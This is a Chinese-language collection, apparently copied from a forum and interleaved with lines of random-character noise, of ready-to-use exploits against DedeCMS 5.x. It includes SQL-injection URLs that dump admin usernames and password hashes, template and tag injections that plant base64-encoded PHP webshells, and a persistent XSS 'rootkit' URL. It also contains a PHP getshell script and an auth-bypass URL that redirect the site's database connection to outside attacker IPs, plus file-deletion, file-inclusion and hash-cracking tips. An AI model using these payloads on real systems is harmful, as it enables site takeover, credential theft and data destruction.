|
|
% y* a4 M5 e7 ]+ G) Q5 k% jDedecms 5.6 rss注入漏洞
" C* J! Y8 J2 M5 C4 K1 [1 uhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=12 W8 G D: e% @$ z$ E! k6 K
4 [: w: {7 _% c8 Y
4 I( O: h% `7 M
$ H; o' d+ m! ~
% b8 t: b1 r" g& e% A1 ^
4 Y& {& j, y7 R5 f6 A! u+ A
1 x6 O- O+ D7 O' q/ o9 A- \7 |4 T0 r J0 M
( L! i5 X$ B2 W CDedeCms v5.6 嵌入恶意代码执行漏洞
9 P7 \' s# |. f4 U注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}0 F. @8 d. r/ i/ i/ R
发表后查看或修改即可执行
5 ~8 m4 v7 m, q& e& z9 @7 Fa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}- ?: T7 a$ j$ X; |
生成x.php 密码xiao,直接生成一句话。5 W; w+ I# k b6 v7 {1 v+ _
2 Q) y8 J7 H2 c; Y
9 O& V) t) G, f- I7 b
! t. K$ M4 I* d3 ~" m- g8 m; f8 N3 ~4 G! T
2 r( P8 R3 Y, |+ h, G3 F3 _0 L3 i8 `
4 g& q+ y3 T! f* Y( p
. D$ s4 o# Y, |9 i
5 C" t8 n q+ V* t% ODede 5.6 GBK SQL注入漏洞
0 t* ^+ ]3 F) t, b8 chttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';7 a7 u; V5 }5 t9 w" Z
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe( m, P& C$ d0 o- ?4 L+ ~
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
* v6 l# { F# D5 q$ k
, K. h6 y2 C. E- c( E* G8 N& P' }8 _3 e( z" s5 B$ k: A8 y+ R6 @' L0 w
) K- n/ o; W* C! B5 H' y4 t Y0 |8 S1 d w8 Y' c+ P1 @" c9 C
4 c& }6 ?. z% J0 B0 x
9 O5 i2 Y! ~! o5 k
% e. \0 i1 }6 z/ o8 r
" K2 H; {( H% z# O$ QDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞. M( ?! h& \. q6 C ~2 r" A
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 4 }; M. O) K, \* l% [, X
- I3 j# g& K. A" P
' h/ B9 C4 B# n: v7 p
0 C. ^* M y. n3 O
7 j( H& L, A$ a& Q) P
, Y6 \; B0 Q" f+ ~
- o# y( J$ Z1 e; H6 ODEDECMS 全版本 gotopage变量XSS漏洞
2 w( G. B' [1 `- I5 j. k( ^1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 , l5 D" _5 [% d- V3 I9 y5 C
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="3 ]% |& d) m. e7 l4 G4 w
1 c9 i. [7 H. V# [3 V& u: q- {; k* v& z
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
% L& t4 \" J A" T8 fhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
- L8 z) C( q% B# m. V( b" z9 }3 J: U! B5 u: S3 _5 g$ y
$ {' i! d! c0 g; B* g$ ahttp://v57.demo.dedecms.com/dede/login.php1 {3 y9 G, N) C3 x2 _+ w _
' T: r5 J8 T$ w+ P* Q
( i4 D0 u' V7 C/ {1 Fcolor=Red]DeDeCMS(织梦)变量覆盖getshell
' G+ J/ B* ]! |7 B& Q' J; E& Y#!usr/bin/php -w
& Q/ ]+ @0 Y7 T1 E3 z<?php
( K' d) ~! \( c0 kerror_reporting(E_ERROR);! Z+ h# A; Q# f I. g! ]
set_time_limit(0);& J$ m6 M. g7 p
print_r('
|$ X& M3 q' k, R$ pDEDEcms Variable Coverage( J# f7 r: w7 l+ S& ^
Exploit Author: www.heixiaozi.comwww.webvul.com
# S0 ]; \) I% \. J3 t! B! e$ r); m. d" u+ |) \7 X( ]! y
echo "\r\n";' t' x, s" a4 R# P% W: a5 B
if($argv[2]==null){
8 P; i( [1 F ?1 [8 qprint_r('4 E+ P4 Z5 ~' O! l$ V1 _3 ~) R
+---------------------------------------------------------------------------+
' Z5 D9 L# ?" P- G! m* _Usage: php '.$argv[0].' url aid path1 l6 J& S# k; l! q' j& S8 f
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
) h! L8 x' q& U* X/ Z8 L$ i% FExample: m5 X" \/ T6 ?# L
php '.$argv[0].' www.site.com 1 old
, @1 |# h8 t i+ C* {+---------------------------------------------------------------------------+# ]9 d% A- |8 B/ Q% Z
');
, D" n8 I+ N4 Bexit;
1 q1 ]: ]9 j# y( v}& a5 @% J' E4 U- G0 m7 M
$url=$argv[1];( r+ ^7 L1 \# w# Q& ]
$aid=$argv[2];
], Q6 t1 g: G$path=$argv[3];0 b# s9 p& ^( O. w
$exp=Getshell($url,$aid,$path);7 _+ a, @7 x* _+ k ~: w0 i
if (strpos($exp,"OK")>12){
: U3 K) Q& Z# c+ S$ E3 C- l/ o$ E& _echo "5 K& U2 W6 s/ o, {8 a3 d
Exploit Success \n";6 h& X# _- l& \
if($aid==1)echo "4 E8 t& j1 L8 N* C
Shell:".$url."/$path/data/cache/fuck.php\n" ; a6 @) u( P5 E- w4 w: V
0 _( @1 l. ^* a: ~+ s5 h* k" G, ^ r& x/ c& {
if($aid==2)echo "
5 x- ^* H& G; X: v, dShell:".$url."/$path/fuck.php\n" ;* U5 _9 x5 O9 j! t6 `* R
1 S7 ^" K7 I( R* c( m
( L: J& h1 H/ g n& J* V2 j
if($aid==3)echo "
4 H5 k" |5 \* ]' c l, O. g9 |Shell:".$url."/$path/plus/fuck.php\n";; m" ^) z+ O0 Y( j- C: I, n
" J' @! r: M: A; U) C* q# a, G; D9 F$ b1 f6 h% Z" F# t6 u" Y/ \
}else{2 X$ d+ ^# x3 X; B
echo "( K& U+ M. w5 r. y
Exploit Failed \n";
]4 n: K9 J+ G: v! t Z4 x}
/ f! K7 e& Q: Y) \& v6 I! Hfunction Getshell($url,$aid,$path){0 Q e, y9 _/ R9 C. A# x* i B
$id=$aid;' ~6 F! c& q g. ~$ _% U
$host=$url;
& ^9 V i1 x- t. m. a3 g" B$port="80";
4 L9 b9 `+ Q/ N' d$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";. U' ]5 _+ r: M* `% w \# n
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
. {# \2 w$ @, q2 M$data .= "Host: ".$host."\r\n";8 J9 S; E+ e# _ S1 ?
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";! }& G0 v1 ^) r& T& o- K3 m
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
& D" P$ L- J6 o& r+ J1 j/ o$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";: G+ o5 X7 Q# l. @
//$data .= "Accept-Encoding: gzip,deflate\r\n";, w v2 X; [6 I& E* Z8 p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";( m5 [( X' ~; I; w C/ v9 _
$data .= "Connection: keep-alive\r\n";$ G" X% Z( l: Z+ I6 v' |
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
' x/ X% ?9 {& Z+ S* T( M2 h) I$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
: m: s5 h. S( \- u9 l4 S4 e$data .= $content."\r\n";
; @/ y; n* G, H' j; P- c; V2 i/ V$ock=fsockopen($host,$port);
9 [# K% k3 J5 P" s E- J# F" Fif (!$ock) {2 ]& a: g& m. {" f3 o
echo "
9 @! M' Y1 }1 x- FNo response from ".$host."\n";$ l! ^1 Y8 L" k
}
8 l& ^8 B1 S# B0 R3 T2 ]fwrite($ock,$data);
4 ]4 R2 C4 O5 ~7 j7 T6 N2 _* P% bwhile (!feof($ock)) {
$ g4 [" q1 W! H3 N A& i1 E$exp=fgets($ock, 1024);
" a, X4 ?1 f7 lreturn $exp;9 u' _6 W8 d* b, m; B4 _" e
}2 B& a6 {7 @9 {- C' ?& K6 K$ r8 s
}6 ?$ y1 a, z# V% ]2 N/ K
2 f& R$ Y! g( O% H( ~4 c: V {- u2 F' g( n8 a# D
?>+ M2 O+ u+ m) e7 y
6 r0 C( q+ S% g
1 o7 U2 V' s2 R5 k" ]# x; I0 V; B) B6 B# Z: t$ z/ S
( F5 M* q! X7 u+ Q3 y& L) E/ W& S! K" C- H
' J$ l2 T9 B7 W0 ^7 E# O
4 |* F: H) g; ~& _
' w9 K% A' o, R6 h' i4 F
! g6 M( w- r0 v) t
" S2 n& ]" g3 C# v) K( l0 M. }9 rDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
; x) v' T* w" g. rhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: D- {4 U" ^3 k% V4 ^: s; l" a, \) _8 k4 ^5 x+ x+ w! H
( Q- I& |! F0 E# h6 M5 _把上面validate=dcug改为当前的验证码,即可直接进入网站后台
$ A0 w) A a8 F; u
+ q7 F/ B3 E( X) Z" Q* N/ @7 T/ o3 H+ b& F' X7 r+ z4 }0 @4 f% z: i
此漏洞的前提是必须得到后台路径才能实现
& w- t4 J, S8 k+ m
. N9 }8 ^' Q- D# I- ~. s
" q* ~% U2 p( ^# m2 L, y$ u
; n9 P% V) L9 P, {' c! ? t, K
; v* R+ M7 D: x+ |/ W2 |
/ i% k# l% x, e0 @3 }# f4 P) F/ m3 U% `9 P5 Q, v
( J5 |8 m! f8 h5 t; |/ W0 _! l2 t
* [7 [: i: k0 F0 M4 d
) \) `; a6 D7 `1 S! Q+ C
$ r0 c0 h9 I" `9 D
Dedecms织梦 标签远程文件写入漏洞! H& @& V4 r. e' L1 \6 }! `
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
) I% M) B8 q/ l0 ^: V5 ~) D: D$ [- p4 b @8 d- \
$ C, p! {% Q9 z6 l$ K2 t$ S再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
: B6 }9 t1 N& x<form action="" method="post" name="QuickSearch" id="QuickSearch">& L7 j0 }+ X) D) r2 V; d1 N
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ X2 ^: x6 ~/ l" a5 L% U0 Z6 V
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: n; T$ E9 B; }<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />, Q0 [$ A8 l8 G- U: n5 E0 X
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
7 R9 w* w5 ]! Q% B a( g- \! [0 ~<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />+ g: g, _. y! o- w
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
( i" i$ u; K) n& M. o<input type="text" value="true" name="nocache" style="width:400">& A% g4 N$ o# a
<input type="submit" value="提交" name="QuickSearchBtn"><br />5 d( ]& e. H5 b+ J' n1 I
</form>
; Y; X- `5 P. S2 b. [% `& Z2 C<script>+ D7 ]/ a2 F4 G. M1 J) O
function addaction()+ _! |' M8 r' f4 b
{7 U. j8 R1 s s! c
document.QuickSearch.action=document.QuickSearch.doaction.value;
$ \& M2 R& o" X! Z; o% `}9 Y5 f0 E; W; i! s8 Z: M
</script>7 |) y, } X q! r* @6 Y
. e- R, u/ c' y
: R2 w) j& u5 v4 K# G9 D/ \3 W
: B4 F$ H4 G, D7 Y' }5 X" N5 J; R- X! c1 I% [
2 H6 W4 i, H0 s6 g1 \
5 w" H' z; S' M& F
# x' } r6 L! U
4 G$ f3 S. E" m- D) ~' v0 _1 {8 M, H( j
( c0 Y! E$ ~* e1 R# Q4 q: o
DedeCms v5.6 嵌入恶意代码执行漏洞
6 N& V+ N4 ~. y6 X5 Q2 w6 w$ u! ~3 X注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
1 b% Q' u4 e1 @- C9 ?, e4 ~) Xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 J- x$ a: T7 r4 t/ ~2 ?$ ^
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
5 A' R3 n' X2 R$ `7 DDedecms <= V5.6 Final模板执行漏洞* e1 X0 g: C/ D/ E0 l8 R
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:$ ~1 g1 k$ S2 T- _, @/ Z4 `6 ]
uploads/userup/2/12OMX04-15A.jpg
V% ]$ v$ m/ w1 P4 D9 n
) S) L4 L5 c+ E3 ?" L# B
/ }: m4 \; @6 {2 l模板内容是(如果限制图片格式,加gif89a):) ^9 |7 v6 a- v1 s0 T- C5 ^% w
{dede:name runphp='yes'}
& H* \4 p% v0 a* V% I+ w, Q! O% z$fp = @fopen("1.php", 'a');
5 d m) x# l: r7 Z% f@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
" W& n' l3 N' B$ r@fclose($fp);3 b& S# M& h O* b" Z% `
{/dede:name}0 A2 b8 \ ^7 x, g ?
2 修改刚刚发表的文章,查看源文件,构造一个表单:' H6 z1 J4 v1 _6 S" j2 w- z( R# q
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
+ l6 [- ?4 A) i0 L( ^& A<input type="hidden" name="dopost" value="save" />% l" M* t, I' Z3 F5 {$ _ [
<input type="hidden" name="aid" value="2" />2 e ]/ j* c1 N3 u/ e% a' ?
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />0 h% P: T7 g/ e- h) i$ P
<input type="hidden" name="channelid" value="1" />
8 B6 z. R# B- f$ w& V" ~<input type="hidden" name="oldlitpic" value="" />
3 t' {! J2 j" ]9 T7 g( H<input type="hidden" name="sortrank" value="1275972263" />
9 l6 a% S, m3 J. y# P( C4 G4 M, m! r) V
8 g7 A$ [+ f! O1 \5 A- S9 x9 |
<div id="mainCp">
& H3 z1 k4 s. H! Y$ c; K<h3 class="meTitle"><strong>修改文章</strong></h3>% n4 V) n/ V+ y
2 G4 W4 i& [- A* L2 H$ k
9 b4 L7 `) x$ x0 N<div class="postForm">
8 W2 S' {, w2 u0 N. u<label>标题:</label>
( K+ J7 K# n6 P+ N<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
/ N8 e$ a2 @) U+ Y: N2 F6 Y' t* z! S1 E# U
; q7 Q) R' c5 G, x. F. {2 `4 G<label>标签TAG:</label>0 R5 s/ g( z" ]' w0 k8 i1 d
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)- y; H/ o9 r( U/ l+ U- f" S9 u$ @
9 g4 ^) i. O6 e" `8 W; g( A& @
% m% J+ E9 ]: H% l8 _<label>作者:</label>/ L! f/ w2 l( }7 l/ V9 u5 H
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, F7 \5 O; l8 [! u6 b
% z2 k+ T" A$ k" B2 K; b
- H6 a7 J. w8 }6 e% F( v; V
<label>隶属栏目:</label>( h9 `2 L, H& \
<select name='typeid' size='1'># ?& w4 r6 N! w# d# i
<option value='1' class='option3' selected=''>测试栏目</option>
; i1 i1 g. i5 F3 n* a* v3 { e</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)' e/ T+ O* I- W/ g8 I; p( b
& s5 q7 M& T4 f5 Y- H- l$ b
* I R, J, W/ P" o( p F1 g9 e
<label>我的分类:</label>
, b/ G. V4 o4 X" e8 I" `6 q<select name='mtypesid' size='1'>
( }" \4 e8 ?" r( M h<option value='0' selected>请选择分类...</option>
1 Q1 S, a* {# G<option value='1' class='option3' selected>hahahha</option>9 r( ~4 ]6 e# a3 j6 f) b
</select>
: z. a- \& }: k V
4 y% U& ]+ x" z3 L2 a
" S3 h3 A9 G% {<label>信息摘要:</label>3 M" v9 M( [7 \6 F$ k; |9 |5 J+ x7 [
<textarea name="description" id="description">1111111</textarea>
7 g' c; m) D6 Q& r6 Z% B. i: e7 o- ~(内容的简要说明)
, x5 Q# Q d; m# q1 P, K8 w# J( l/ o; o! G& q: W9 ?2 ^ T
# D' p- f/ x' P/ g2 m8 a! F. P; j<label>缩略图:</label>; \) `6 L+ |8 K; O- ]0 C) V- r
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>+ l0 y: ]* H0 N- |0 P- `: o
& f) e" B6 T% E9 G: ^ w9 j* s3 V, v7 y- d# \; v$ V
<input type='text' name='templet'4 O2 Y9 ], E# f/ a$ Y; o$ C
value="../ uploads/userup/2/12OMX04-15A.jpg">% ~# v+ N+ B8 s) J* M: t
<input type='text' name='dede_addonfields'
2 _" x( [& h% f+ E2 _5 l& a/ ]3 Gvalue="templet,htmltext;">(这里构造)& A1 e! S1 Y2 q$ e5 ~ G8 c
</div>
6 v2 I& a) h/ n6 E$ @" L; S3 o( `0 b8 s& {1 R$ O) _0 }% U% A
: r: ~% t8 f2 J' T: ?/ L
<!-- 表单操作区域 -->/ Q z, b- z/ G( i6 p
<h3 class="meTitle">详细内容</h3>
3 ^/ Z z( y3 ]& I# Z
' C: l& y% C/ f& `. k8 G; M. W) I4 Y; s* [# Q7 L
<div class="contentShow postForm">
7 J! b ~- G7 L6 {: c<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>9 p( C0 q* X+ d- C! g7 L
g; L8 `( m8 r9 C! w _) O2 c+ @# z+ ]( q% S. Y y; Y
<label>验证码:</label>/ k, N. {9 q- G, U5 g1 v
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />9 r' K0 Y9 d8 T6 y- `8 n
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
% Q. J) K' I1 R( m' k% \" e1 _' z6 B
% w2 v; c5 g/ r" N<button class="button2" type="submit">提交</button>
: y( p4 p7 b: E3 C+ f3 X<button class="button2 ml10" type="reset">重置</button>) M2 F" A6 c# |. x
</div>
5 J2 a t$ F0 _& |# o$ n) Z1 }8 h6 D4 \. a5 }1 m; d0 v/ c: N
4 z* M& `$ h4 x {" ~( B; L
</div>
i* y: I* c( b0 M) n3 r; b, A/ h
& w" J, a! k; A/ K Y+ `</form>
C& R4 D- j- f/ ?+ \7 P( D% d S1 P4 j @. ~
. @8 v) K6 v' r V* a8 ]; p
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
" T! ^! d: e" z. ]* _ V假设刚刚修改的文章的aid为2,则我们只需要访问:$ s! T( G+ K$ x- E6 t J* ^5 c$ c
http://127.0.0.1/dede/plus/view.php?aid=2
# o# Y3 w1 N1 \, F! F+ l" p即可以在plus目录下生成webshell:1.php6 i' [9 R% u. I: A
: }* D: b0 E. i+ H9 ~; [
& {4 b$ y$ e( X# q7 D% k& u+ u9 N! Z3 E& V1 m9 L
9 H1 ? l/ O- Q6 s3 d+ v8 y
3 ^; D4 j' _% q$ ]
% Q8 B) Q: N5 s* n9 |1 M& J5 n
9 p0 `! x. p" ]9 y5 D5 g1 x" S. i9 B2 |. z8 X
2 y- i) |: ?1 T' E3 q
2 Y0 L7 H! ^5 N# t* ]2 u0 T& a4 W7 ~) U0 O5 _8 H& C
% b9 Q* o& y7 F5 ]9 A' U
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6): k" s5 M& e8 K! @8 ]# v- c7 {
Gif89a{dede:field name='toby57' runphp='yes'}0 u* L( W N3 p4 q3 Q: Q0 Z9 r- g
phpinfo();
/ A& Y/ ?- [3 U8 V8 i) e+ a{/dede:field}! l& Y- z7 d) f6 z& @& r
保存为1.gif
9 S1 f& m5 f0 x* M" V, [1 B<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
, p" i8 l) I5 T9 b<input type="hidden" name="aid" value="7" />
4 }" w) k* i1 \7 k2 O3 ]<input type="hidden" name="mediatype" value="1" />
/ X. K9 P+ ]7 V<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> & y) p% C" Q6 J9 y7 I; ~- J" L$ D. C
<input type="hidden" name="dopost" value="save" /> - @$ T2 o% p9 l: H& V( ^
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
4 \0 T+ d/ v# d( p<input name="addonfile" type="file" id="addonfile"/>
b. W6 H. M# K6 G, z' T<button class="button2" type="submit" >更改</button>
6 Q! c& o2 z5 c</form>
, u+ i5 d) X% B+ R' a! f0 y
) N+ e, E4 `0 w. C; h
! U. Z' x. i0 {0 g* a' _4 t构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
8 c7 q/ K' Q; b4 h- ]发表文章,然后构造修改表单如下:: F) g! _- n# C) F( X% M" D7 R8 B
( [ m) _4 k! R) a0 Y+ a& P
# t- w/ b8 a- r7 s0 m- M<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> * \9 ~* D+ \' V" c3 z/ D
<input type="hidden" name="dopost" value="save" />
2 G8 g7 s; M1 j. k' c ~<input type="hidden" name="aid" value="2" /> ) |& k# l3 _2 \- O- Z* ?! J/ }; i+ h
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
) ~! B2 D5 d& B; q<input type="hidden" name="channelid" value="1" />
2 s' V1 E9 n- o( l<input type="hidden" name="oldlitpic" value="" /> % X5 R* g& u" X y! L0 U) t
<input type="hidden" name="sortrank" value="1282049150" />
& ^# x2 j' s6 L+ H0 | T0 z+ V1 Z' ~<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , Y, }7 Y6 o' F6 R
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
* z6 G" f# q" J2 M! @<select name='typeid' size='1'>
. A: V2 H5 x# E<option value='1' class='option3' selected=''>Test</option>
) P' f$ ^# F$ J+ x( C+ }' ^<select name='mtypesid' size='1'> & u" ~$ S) q+ C
<option value='0' selected>请选择分类...</option>
3 C6 l8 v- K, I, {: r<option value='1' class='option3' selected>aa</option></select> ; i2 C3 Z8 J4 ~& Q. _" G' P" Q g" i
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * A! g! m/ E) o% l( r
<input type='hidden' name='dede_addonfields' value="templet">
~$ t$ n" e! O, m( n5 [# p<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
, r6 J D3 h2 ~( Y) X+ i" v<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
) a6 p3 H* N; F8 Z<button class="button2" type="submit">提交</button> , R1 T0 X8 h. ^- S! ~& M6 M
</form>
6 ~( H8 ~, q' g% R1 T. j
& l$ l4 \" q" L: ^) T+ p
: Z! L+ l# R1 v+ i4 K7 d5 }9 v: ~3 ^# z# K
8 E0 d) e9 |( |& [
2 ?" g+ k% {8 t: D1 F+ q( h, H# M/ J+ M. c* F
6 B1 l5 `6 R) _ o# A: G' I- d( }& D
: {* o4 e/ T# H6 ^- |: ]5 m
3 j6 q1 ? r* L2 I$ ~7 V$ e, p) d1 _0 U+ {7 _9 A; C, O8 g# y
/ Z9 ^5 @- { r+ T0 s: Y* Q织梦(Dedecms)V5.6 远程文件删除漏洞
* a) S7 L# F+ E6 q( \) b Dhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif% p0 h- i9 P) G) L7 `- p/ C" d7 L
) u% F$ f. }* }8 ~7 |) u
$ P6 ^* R! J! V
8 C2 F& n4 |: X- z( x+ m3 _
; Z3 W; H4 i0 @' m2 h/ L; c; g0 u0 J `' ]- ? J& n- Y6 x
. X5 _# V, p* [0 \! P+ U: z! i2 C" y% e
& z0 A8 K: E1 S/ r& a4 Z6 N8 w( k' j- X
* ?; d& R( K+ I+ y, x& O1 q) i$ L* @ v' F5 F) g( z5 k, E
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
& l1 K( H/ ^: f( e- @+ J i- z% s, P) Qhttp://www.test.com/plus/carbuya ... urn&code=../../
& }8 p" f- B4 V* I7 { z5 s0 }
* ~ c2 K: d. @
" q3 J* Y/ s; |) N/ G9 V7 D. u% R& t5 }3 m: \ [; S, G; c! P
% K r) A! c. f- T0 t3 N+ U2 M+ I, S1 g1 l- B3 x' C" ?. S9 l
7 `0 R) I* V8 M4 X3 v0 Y
# B4 Z" x' z5 V% {9 M( f. k: k$ O8 a9 a& H2 \
8 p# ~9 K) m" C! v- E/ p# `# k9 W, S+ U! _4 {& @7 q
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 , l) s# n8 J. w" ?0 Y- X. a
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`- t2 Y |8 b8 ~. k" z4 p
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
3 Q$ Z6 R( g: u
# T. E* [) K* j7 p6 |0 u, Q
5 M: y+ N! v" @$ F* V+ j
/ V) X% r8 n* a4 ?5 k H3 W) R
3 C( Y k* B) b4 {
; [3 G" d+ X( W' V# T3 C$ X$ X; l5 s j. E
% `: @9 v& K) I6 F( Q0 H6 [
% ]2 A A& }# m* m! N
0 O% r7 z, o5 p( ~
6 I% R( l$ X1 I. C* _- O织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; ~& b c% M6 D( y
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='( O& _( u) K7 ^! J
9 E$ t# E) G$ `; X
/ w' z* u3 V+ q9 l8 B
" A, f3 R+ m! O0 X) i( F' U7 W t& d- B% n
N/ P) |$ ~' ]6 c3 C
9 }( i* }9 y. q% \+ L4 }% l" o
) Y6 j1 ^* w5 \/ |3 H
